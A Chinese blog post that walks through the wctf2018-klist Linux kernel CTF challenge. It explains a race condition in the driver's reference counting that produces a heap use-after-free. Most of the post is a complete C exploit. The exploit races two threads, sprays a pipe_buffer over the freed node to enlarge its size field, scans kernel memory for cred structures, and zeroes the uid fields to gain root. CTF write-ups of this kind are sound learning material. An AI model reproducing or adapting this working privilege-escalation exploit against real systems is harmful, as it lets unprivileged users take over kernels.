linux kernel pwn学习之条件竞争(一)

最新推荐文章于 2022-07-15 09:59:00 发布
最新推荐文章于 2022-07-15 09:59:00 发布
阅读量1.7k 收藏 2
点赞数 3
分类专栏: pwn CTF 二进制漏洞 文章标签: 安全 PWN CTF 二进制漏洞 Kernel Exploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/104649351
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

Linux kernel条件竞争

条件竞争发生在多线程多进程中,往往是因为没有对全局数据、函数进行加锁,导致多进程同时访问修改,使得数据与理想的不一致而引发漏洞。本节,我们从wctf2018-klist这题来分析一下条件竞争制造UAF的利用。

wctf2018-klist

首先,查看一下启动脚本,发现开启了smep机制,说明内核不能直接执行用户空间的代码

  1. qemu-system-x86_64 \  
  2. -enable-kvm -cpu kvm64,+smep   
  3. -kernel ./bzImage \  
  4. -append "console=ttyS0 root=/dev/ram rw oops=panic panic=1 quiet kaslr" \  
  5. -initrd ./rootfs.cpio -nographic -m 2G \  
  6. -smp cores=2,threads=2,sockets=1 -monitor /dev/null \  
  7. -nographic  

然后,我们用IDA分析一下list.ko文件,open的时候,初始化了一个缓冲区,然后初始化了一个互斥锁

Read的时候,是从缓冲区里记录的节点里读取数据,每一步操作,都在互斥锁内部,说明这里执行时,其他线程会被排斥到外,直到当前线程执行完解锁。

Write的时候,同理,向缓冲区记录的节点里写数据

ioctl定义了增删改查的操作

Select_item函数的作用就是选择指定位置的节点记录到缓冲区里,这样才能对其进行read/write操作。全程都有互斥锁的保护。

创建节点,会把节点的used字段设置为1

Remove节点,全程没有显式的调用kfree函数,我们注意到put函数

Put函数里,对节点的used域做了原子减法减去1,如果结果为0,就会释放这个节点

配套的get函数,对节点的used域做了原子加法加1

所以,我们发现,remove_item里,都是用的put来释放节点,因为节点创建时,used=1,减去1就是0,就被释放了。我们发现,除了remove_item函数里,是put单独使用,其他函数里都是getput配套使用。

比如这个select_item函数里,就是配套使用,由于都在互斥锁里,所以最后执行完毕,used的值不会变。照着这个思想,我们来看一下list_head函数,漏洞就在这里,put操作没有在锁内,并且是put(g_list),g_list就是整个链表的头节点

我们再回过头来看看创建节点时,采用的是头插法

并且,新节点的used域为1,假如,在list_head函数的get操作之后,put操作之前,另一个线程正好创建了一个新节点,把g_list赋值为了这个新节点,接下来put操作,将g_listused减去1后发现为0,就会释放这个节点,然后却没有把g_list指向下一个节点,这就造成了堆的UAF。

内核堆的UAF很容易利用,一种方法是将tty_struct申请到这里,伪造ops指针,然后本题我们不能使用tty_struct,因为,我们没有权限打开/dev/ptmx设备,看看init脚本里设置了啥

  1. ...  
  2. chown root:tty /dev/console  
  3. chown root:tty /dev/ptmx  
  4. chown root:tty /dev/tty  
  5. ...  

那么,我们在用第二种方法,之前,我们分析到,这个链表节点的结构是这样的

  1. struct list_node {  
  2.    int64_t used;  
  3.    size_t size;  
  4.    list_node *next;  
  5.    char buf[XX];  
  6. }  

我们如果能控制size域,将它赋值很大,那么,我们就能溢出堆,搜索内存里的cred结构,然后改写它,进而提权。然而,我们UAF只能控制buf数据区。有一个巧妙的方法就是利用pipe管道。在pipe创建管道的时候,会申请这样一个结构

  1. struct pipe_buffer {  
  2.     struct page *page;  
  3.     unsigned int offset, len;  
  4.     const struct pipe_buf_operations *ops;  
  5.     unsigned int flags;  
  6.     unsigned long private;  
  7. };  

其中,page是pipe存放数据的缓冲区,offset和len是数据的偏移和长度。比如,一开始,offset和len都是0,当我们write(pfd[1],buf,0x100);的时候,offset = 0,len = 0x100。然而,我们注意到,offsetlen都是4字节数据,如果把它们拼在一起,凑成8字节,就是

0x10000000000,如果能够list_nodesize域对应起来,我们就能溢出堆了。

因此,我们一开始申请一个与pipe_buffer大小一样的堆,然后利用竞争释放后,创建一个管道,pipe_buffer就会申请到这里,接下来再write(pfd[1],buf,0x100),就能使得size域变得很大,那么我们就能溢出堆,进行内存搜索了。

我们的exploit.c程序

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>

//pipe_buffer的大小,阅读源码可知
#define PIPE_BUFFER_SIZE 0x280

//驱动的fd
int fd;
//打开驱动
void initFD() {
   fd = open("/dev/klist",O_RDWR);
   if (fd < 0) {
      printf("[-]open file error!!\n");
      exit(-1);
   }
}

//创建节点时,需要发送的数据
struct Data {
   size_t size;
   char *buf;
};

void addItem(char *buf,size_t size) {
   struct Data data;
   data.size = size;
   data.buf = buf;
   ioctl(fd,0x1337,&data);
}

void removeItem(int64_t index) {
   ioctl(fd,0x1339,index);
}

void selectItem(int64_t index) {
   ioctl(fd,0x1338,index);
}

void listHead(char *buf) {
   ioctl(fd,0x133A,buf);
}

void listRead(void *buf,size_t size) {
   read(fd,buf,size);
}

void listWrite(void *buf,size_t size) {
   write(fd,buf,size);
}
//检查是否root成功
void checkWin(int i) {
   while (1) {
      sleep(1);
      if (getuid() == 0) {
         printf("Rooted in subprocess [%d]\n",i);
         system("cat flag"); //我们很难getshell
         exit(0);
      }
   }
}
#define BUF_SIZE PIPE_BUFFER_SIZE
#define UID 1000
char buf[BUF_SIZE];
char buf2[BUF_SIZE];
char bufA[BUF_SIZE];
char bufB[BUF_SIZE];

void fillBuf() {
   memset(bufA,'a',BUF_SIZE);
   memset(bufB,'b',BUF_SIZE);
}
int main() {
   initFD();
   fillBuf();
   addItem(bufA,BUF_SIZE-24);
   selectItem(0);
   int pid = fork();
   if (pid < 0) {
      printf("[-]fork error!!\n");
      exit(-1);
   } else if (pid == 0) {
      //开这么多子进程程,是为了增加cred结构被分配到堆下方内存的成功率
      for (int i=0;i<200;i++) {
         if (fork() == 0) {
            checkWin(i+1);
         }
      }
      while (1) {
         //与主线程的listHead竞争
         addItem(bufA,BUF_SIZE-24);
         selectItem(0);
         removeItem(0);
         addItem(bufB,BUF_SIZE-24);
         listRead(buf2,BUF_SIZE-24);
         if (buf2[0] != 'a') {
            printf("race compete in child process!!\n");
            break;
         }
         removeItem(0);
      }
      sleep(1);
      //到这里,条件竞争成功
      removeItem(0); //把空间腾出来
      int pfd[2];
      pipe(pfd); //管道的pipe_buffer将会申请到我们能够UAF控制的空间里
      write(pfd[1],bufB,BUF_SIZE);
      size_t memLen = 0x1000000;
      uint32_t *data = (uint32_t *)calloc(1,memLen);
      listRead(data,memLen);
      int count = 0;
      size_t maxLen = 0;
      for (int i=0;i<memLen/4;i++) {
         if (data[i] == UID && data[i+1] == UID && data[i+7] == UID) {
            memset(data+i,0,28);
            maxLen = i;
            printf("[+]found cred!!\n");
            if (count ++ > 2) {
               break;
            }
         }
      }
      listWrite(data,maxLen * 4);
      checkWin(0);
      /*size_t *d = (size_t *)data;
      for (int i=0;i<0x100000 / 8;i++) {
         printf("0x%lx ",d[i]);
      }*/

   } else { //主线程
      while (1) {
         listHead(buf);
         listRead(buf,BUF_SIZE-24);
         if(buf[0] != 'a')
            break;
      }
   }
   return 0;
}

 

ha1vk
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux内核竞态与并发介绍
lh0616的博客
12-13 656
文章目录前言一、相关术语的含义1. 临界区2. 进程上下文3. 中断上下文4. SMP二、竞争条件1. 临界区被并发访问产生竞争条件2.防止竞争条件三、造成并发执行的原因四、解决并发访问临界区的手段总结参考资料 前言 在Linux 内核中,当多个线程同时访问相同的资源(驱动程序中的全局变量是一种典型的共享资源)可能会引发"竞态",因此我们必须对共享资源进行并发控制,防止出现各线程之间相互覆盖共享数据的情况,造成被访问数据处于不一致的状态。 提示:以下是本篇文章正文内容,下面案例可供参考 一、相关术语的含
攻防世界PWN之Play(条件竞争)题解
seaaseesa的博客
12-19 1849
Play(条件竞争,多进程共享同一数据区域) 首先,检查一下程序的保护机制,很好 然后,我们用IDA分析,发现一个很明显的栈溢出漏洞 但是,要想执行这个漏洞函数,就必须打赢游戏 而,要打赢游戏,就是让*(_DWORD *)(gMonster + 8)的值小于等于0,也就是Host的Surplus要小于等于0 然后,我们看到这里有一个修改(gMonster + 8)值的地方...
linux内核竞争条件漏洞,【漏洞预警】CVE-2016-8655:Linux内核竞争条件漏洞
weixin_29532075的博客
05-10 212
Seclists.org全新公布了Linux的市场竞争标准漏洞漏洞序号为CVE-2016-8655。此漏洞可用以从低管理权限进程中实行内核编码。漏洞序号CVE-2016-8655漏洞简述Philip Pettersson在Linux (net/packet/af_packet.c)发觉标准市场竞争漏洞,此漏洞可用以从没受权进程中实行内核编码。网络攻击只必须当地低管理权限,就能运用该漏洞致拒绝服务...
linux c 进程的实现,Linuxc - 进程竞争条件
weixin_39951112的博客
05-11 93
linuxc-进程竞争条件当多个进程都企图对共享数据进行某种处理,而最后的结果又取决于进程运行的顺序时,我们认为发生了竞争条件(race condition)。详情见《unix环境高级编程》8.9小节解决方法:waitpid、getppid等条件轮询进程间通讯,主要实现TELL_WAIT、TELL_PARENT、WAIT_PARENT、TELL_CHILD、WAIT_CHILD5个函数。code信...
linux内核竞争条件漏洞,Linux 内核音频子系统条件竞争漏洞分析(CVE-2017-15265)...
weixin_42399388的博客
05-10 284
一、前言近日,启明星辰ADLab在对 Linux 内核进行源码审计时发现,Linux 内核的音频子系统存在一个条件竞争漏洞 CVE-2017-15265(CNVD-2017-30251、CNNVD-201710-230),条件竞争导致了 use-after-free 漏洞,可以用来进行本地提权。由于绝大部分 Linux 发行版采用了这个子系统,所以内核版本低于4.14-rc5的系统均会受到此漏洞影...
Linux编程】竞争条件
Nestle的专栏
06-10 1738
当多个进程都企图对共享数据进行某种处理,而最后的结果又取决于进程进行的顺序时,则我们认为这发生了竞争条件。一个例子是在fork出子进程之后,父、子进程的执行顺序是不确定的,这种不确定决定了后面程序的结果,那么这便产生了一个竞争条件。 如果一个进程希望等待一个子进程终止,则它必须调用wait或waitpid函数。如果一个进程要等待其父进程终止,则可使用如下的轮询方式: while (
02-linux pwn入门学习到放弃.pdf
09-20
02-linux pwn入门学习到放弃.pdf
Pwn学习路线及学习笔记以及gem安装
最新发布
10-15
《汇编语言》是Pwn学习的必备知识之一。作者建议从王爽老师的《汇编语言》开始,通过学习汇编语言来了解计算机内部的运行机理。汇编语言可以使大家更加深入地了解计算机内部到底是怎样运行的,并且可以学习到很多有...
pwn学习历程.pdf
09-30
pwn学习修炼之旅,内部包含各个模块各个知识点,有助于爱好者有方向的学习前进,加油,很好的资料哦,很有意义。
Linux pwn入门教程.rar
09-21
Linux pwn入门教程\环境配置\栈溢出基础\格式化字符串漏洞
linux内核竞争条件漏洞,Linux内核AF_VSOCK套接字条件竞争漏洞(CVE-2021-26708)分析...
weixin_30599521的博客
05-10 484
漏洞背景近期,国外安全研究人员在oss-security上披露了一个AF_VSOCK套接字条件竞争高危漏洞CVE-2021-26708(CNVD-2021-10822、CNNVD-202102-529)。根据披露细节,该漏洞是由于错误加锁导致,可以在低权限下触发并自动加载易受攻击驱动模块创建AF_VSOCK套接字,进而导致本地权限提升。该漏洞补丁已经合并到Linux内核主线中。VSOCK介绍和架构...
linux内核竞争条件漏洞,Linux内核竞争条件漏洞-导致远程代码执行
weixin_35223524的博客
05-10 108
原标题:Linux内核竞争条件漏洞-导致远程代码执行本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。运行了Linux发行版的计算机设备,如果内核版本小于5.0.8的话,将有可能受到一个内核竞争条件漏洞的影响,并导致系统无法抵御远程网络攻击。潜在的攻击者可以利用Linux内核中net/rds/tcp.c的rds_tcp_kill_so...
CTF-PWN-play (条件竞争,多进程共享同一数据文件)
SuperGate的博客
02-16 851
程序概述 [*] '/home/supergate/Desktop/Pwn/pwn' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 只打开了NX保护,这为...
骇极杯_2018_momo_server(条件竞争UAF)
seaaseesa的博客
09-14 919
骇极杯_2018_momo_server(条件竞争UAF) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 Count功能开启了一个线程 该线程会异步进行堆的free操作,其中注意到free(ptr[i]->name)后,没有将name指针清零,并且该循环尾部会休眠1s。 结尾会将ptr指针清零 在add函数中,如果name已存在,那么仅更新count和flag。 因此,我们在ptr[i]被清零之前,通过add更新count和flag,这样,name就会被二
kernel pwn
nelson11112的博客
04-11 3606
比赛中的kernel pwn 比赛中我们会得到下面几个文件 正在上传…重新上传取消 bzImage 这是一个内核编译生成的压缩内核映像 core.cpio这是一个文件管理系统 针对core.cpio会有一系列常规操作 mkdir core cd core mv ../core.cpio core.cpio.gz // cp ../core.cpio core.cpio.gz gunzip core.cpio.gz cpio -idmv < core.cpio 然后我们在core..
Kernel Pwn 入门 (1)
CoLin的pwn小屋
04-24 3714
Kernel pwn 入门 (1):环境搭建、注意事项、第一个Kernel pwn题:QWB2018-Core
Kernel Pwn 入门 (4)
CoLin的pwn小屋
07-15 706
Kernel pwn 入门之堆溢出
Linux pwn零基础入门教程:环境配置到实战攻击
教程特别关注i386和amd64架构下的常见pwn手法,包括但不限于栈溢出、堆溢出、整数溢出、格式化字符串攻击和条件竞争。 教程特色在于提供了一个完整的学习路径,所有的环境都被封装在Docker镜像中,便于学生在不同...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值